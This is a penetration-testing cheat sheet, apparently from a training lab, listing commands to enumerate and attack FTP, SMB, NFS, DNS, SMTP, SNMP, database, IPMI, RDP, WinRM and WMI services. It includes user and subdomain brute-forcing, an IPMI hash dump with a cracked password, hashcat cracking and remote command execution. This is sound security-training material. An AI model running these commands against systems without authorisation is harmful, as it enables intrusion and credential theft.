Service Enumeration
Enumerating the services on target
FTP
Ports: TCP 20, 21
Check for anonymous logins
Downloading all files from FTP using wget
$ wget -m --no-passive ftp://anonymous:anonymous@SERVERConnect to FTP using SSL
$ openssl s_client -connect SERVER:21 -starttls ftpSMB
Ports: TCP 139, 445
Check for anonymous logins
Listing SMB shares
$ smbclient -N -L //SERVER -U="<username>" --password="<password>"Connecting to a SMB share
$ smbclient //SERVER/notes -U="<username>" --password="<password>"Connect to an SMB share using RPC
$ rpcclient -U "<username>" 10.129.14.128srvinfo
Server information
enumdomains
Enumerate all domains that are deployed in the network
querydominfo
Provides domain, server, and user information of deployed domains
netshareenumall
Enumerates all available shares
netsharegetinfo <SHARE>
Provides information about a specific share
enumdomusers
Enumerates all domain users
queryuser <USER_RID>
Provides information about a specific user
querygroup <GROUP_RID>
Provides information about a group
Brute Forcing Users RID
$ for i in $(seq 500 1100);do rpcclient -N -U "" SERVER -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";doneOr by using samrdump: https://github.com/SecureAuthCorp/impacket/blob/master/examples/samrdump.py
NFS
Ports: TCP/UDP 2049, 111
Show available NFS share
$ showmount -e <TARGET IP>Mounting NFS share
$ mount -t nfs <TARGET IP>:/<share name> ./<local folder>/ -o nolockDNS
Port: UDP 53, TCP 53 for zone transfers
Get all record from a DNS server
$ dig any <hostname> @<IP>Zone Transfer
This can be done recursively after discovering more subdomains
$ dig axfr <hostname> @<IP>Brute force subdomains given a DNS server
This can be done recursively after discovering more subdomains
$ dnsenum --dnsserver <IP> --enum -p 0 -s 0 -f <wordlist> <domain>SMTP
Ports: TCP 25, 465, 587, 2525
SMTP Open Relay Scanning with nmap
$ sudo nmap 10.129.14.128 -p25 --script smtp-open-relay -vSMTP user enumeration
$ smtp-user-enum -M VRFY -U <usernames.txt> -t <TARGET IP> -w <wait time>$ smtp-user-enum -M EXPN -U <usernames.txt> -t <TARGET IP> -w <wait time>$ smtp-user-enum -M RCPT -U <usernames.txt> -t <TARGET IP> -w <wait time>Evolution Mail Client
Once you have credentials for a valid account, install evolution and setup the account to that user
$ sudo apt install evolutionSNMP
Ports: UDP 161
SNMPwalk to enumerate SNMP service
$ snmpwalk -v2c -c <string> <TARGET IP>Onesixtyone to brute force string
$ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt <TARGET IP>MySQL
Ports: TCP 3306
Nmap script
$ sudo nmap <TARGET IP> -sV -sC -p3306 --script mysql*MSSQL
Nmap script
$ sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <TARGET IP>Connecting to MSSQL with python
Download the impacket mssql connector https://github.com/SecureAuthCorp/impacket/blob/master/examples/mssqlclient.py
$ python3 mssqlclient.py Administrator@<TARGET IP> -windows-authIPMI
Ports: UDP 623
Metasploit Dumping IPMI hashes
msf6 > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set rhosts 10.129.42.195
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > show options
Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):
Name Current Setting Required Description
---- --------------- -------- -----------
CRACK_COMMON true yes Automatically crack common passwords as they are obtained
OUTPUT_HASHCAT_FILE no Save captured password hashes in hashcat format
OUTPUT_JOHN_FILE no Save captured password hashes in john the ripper format
PASS_FILE /usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt yes File containing common passwords for offline cracking, one per line
RHOSTS 10.129.42.195 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 623 yes The target port
THREADS 1 yes The number of concurrent threads (max one per host)
USER_FILE /usr/share/metasploit-framework/data/wordlists/ipmi_users.txt yes File containing usernames, one per line
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run
[+] 10.129.42.195:623 - IPMI - Hash found: ADMIN:8e160d4802040000205ee9253b6b8dac3052c837e23faa631260719fce740d45c3139a7dd4317b9ea123456789abcdefa123456789abcdef140541444d494e:a3e82878a09daa8ae3e6c22f9080f8337fe0ed7e
[+] 10.129.42.195:623 - IPMI - Hash for user 'ADMIN' matches password 'ADMIN'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completedhashcat to crack HP iLO ipmi passwords
$ hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?uhashcat to crack generic ipmi passwords
$ hashcat -m 7300 --username hash <wordlist>RDP (Windows)
Ports: TCP 3389
Nmap script
$ nmap -sV -sC <TARGET IP> -p3389 --script rdp*Connecting to RDP service
$ xfreerdp /u:cry0l1t3 /p:"<password>" /v:<TARGET IP>WinRM (Windows)
Ports: TCP 5985, 5986
Nmap script
$ nmap -sV -sC <TARGET IP> -p5985,5986 --disable-arp-ping -nevil-winrm
https://github.com/Hackplayers/evil-winrm
$ evil-winrm -i <TARGET IP> -u <username> -p <password>WMI
Ports: TCP 135
wmiexec
https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py
$ /usr/share/doc/python3-impacket/examples/wmiexec.py Cry0l1t3:"P455w0rD!"@10.129.201.248 "hostname"Last updated